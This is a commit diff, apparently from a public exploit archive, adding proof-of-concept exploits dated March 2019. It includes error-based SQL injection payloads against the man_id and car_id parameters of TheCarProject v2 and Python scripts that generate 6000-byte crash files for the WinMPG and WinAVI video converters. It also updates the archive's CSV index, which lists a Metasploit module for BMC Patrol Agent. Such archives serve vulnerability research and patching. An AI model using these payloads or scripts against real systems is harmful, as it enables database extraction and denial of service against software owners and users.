DB: 2019-03-19

4 changes to exploits/shellcodes WinMPG Video Convert 9.3.5 - Denial of Service WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit) TheCarProject v2 - Multiple SQL Injection
2019-03-19 05:01:56 +00:00 · 2019-03-19 05:01:56 +00:00 · 2a394cba09
commit 2a394cba09
parent 5981a27702
5 changed files with 1277 additions and 0 deletions
--- a/exploits/multiple/remote/46556.rb
+++ b/exploits/multiple/remote/46556.rb
--- a/exploits/php/webapps/46555.txt
+++ b/exploits/php/webapps/46555.txt
@ -0,0 +1,83 @@
+===========================================================================================
+# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
+# Dork: N/A
+# Date: 17-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://thecarproject.org/
+# Software Link: https://sourceforge.net/projects/thecarproject/
+# Version: v2
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: A fully Featured Auto vehicle, Auto Dealer php
+sales web site software
+  built on Bootstrap 3 it will present the best possible viewpoint for
+your customers
+  unlimited items, unlimited images per item. Totally driven from the
+admin side of the site.
+===========================================================================================
+# POC - SQLi
+# Parameters : man_id
+# Attack Pattern :
+-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1
+or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
+FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: TheCarProject v2 - 'car_id' SQL Inj.
+# Dork: N/A
+# Date: 17-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://thecarproject.org/
+# Software Link: https://sourceforge.net/projects/thecarproject/
+# Version: v2
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: A fully Featured Auto vehicle, Auto Dealer php
+sales web site software
+  built on Bootstrap 3 it will present the best possible viewpoint for
+your customers
+  unlimited items, unlimited images per item. Totally driven from the
+admin side of the site.
+===========================================================================================
+# POC - SQLi
+# Parameters : car_id
+# Attack Pattern :
+-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# GET Method : http://localhost/TheCarProject/cp/info.php?man_id=3&car_id=-1
+or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
+FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
+# Dork: N/A
+# Date: 17-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://thecarproject.org/
+# Software Link: https://sourceforge.net/projects/thecarproject/
+# Version: v2
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: A fully Featured Auto vehicle, Auto Dealer php
+sales web site software
+  built on Bootstrap 3 it will present the best possible viewpoint for
+your customers
+  unlimited items, unlimited images per item. Totally driven from the
+admin side of the site.
+===========================================================================================
+# POC - SQLi
+# Parameters : man_id
+# Attack Pattern :
+-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# GET Method : http://localhost/TheCarProject/cp/item_listing.php?man_id=-1
+or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
+FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
+===========================================================================================
--- a/exploits/windows/dos/46553.py
+++ b/exploits/windows/dos/46553.py
@ -0,0 +1,29 @@
+# Exploit Title: WinMPG Video Convert Local Dos Exploit
+# Date: 15.03.2019
+# Vendor Homepage:http://www.winmpg.com
+# Software Link:  http://www.winmpg.com/down/WinMPG_VideoConvert.zip
+# Exploit Author: Achilles
+# Tested Version: 9.3.5 and older ones
+# Tested on: Windows XP SP3 EN
+
+
+# 1.- Run python code :WinMPG.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open WinMPG.exe and Click 'ALL-AVI'
+# 4.- In the new Window click Register
+# 5.- Paste the content of EVIL.txt into the Field: 'Name and Registration Code'
+# 6.- Click 'Register'and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
--- a/exploits/windows/dos/46554.py
+++ b/exploits/windows/dos/46554.py
@ -0,0 +1,28 @@
+# Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit
+# Date: 16.03.2019
+# Vendor Homepage:http://www.winavi.com
+# Software Link:  http://www.winavi.com/user/download/WinAVI_iPod_3GP_MP4_PSP_Converter.exe
+# Exploit Author: Achilles
+# Tested Version: 4.4.2
+# Tested on: Windows XP SP3 EN
+#            Windows 7 x64 Sp1
+
+
+# 1.- Run the python script, it will create a new file with the name "Evil.avi"
+# 2.- Open WinAVI.exe and Click 'Convert to iPhone'
+# 3.- Load the file "Evil.avi"
+# 4.- And you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.avi","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6356,6 +6356,8 @@ id,file,description,date,author,type,platform,port
 46533,exploits/windows/dos/46533.txt,"Microsoft Windows - '.reg' File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows,
 46534,exploits/windows/dos/46534.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
 46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
+46553,exploits/windows/dos/46553.py,"WinMPG Video Convert 9.3.5 - Denial of Service",2019-03-18,Achilles,dos,windows,
+46554,exploits/windows/dos/46554.py,"WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service",2019-03-18,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -17255,6 +17257,7 @@ id,file,description,date,author,type,platform,port
 46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
 46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
 46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
+46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40995,3 +40998,4 @@ id,file,description,date,author,type,platform,port
 46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
 46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
 46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80
+46555,exploits/php/webapps/46555.txt,"TheCarProject v2 - Multiple SQL Injection",2019-03-18,"Mehmet EMIROGLU",webapps,php,80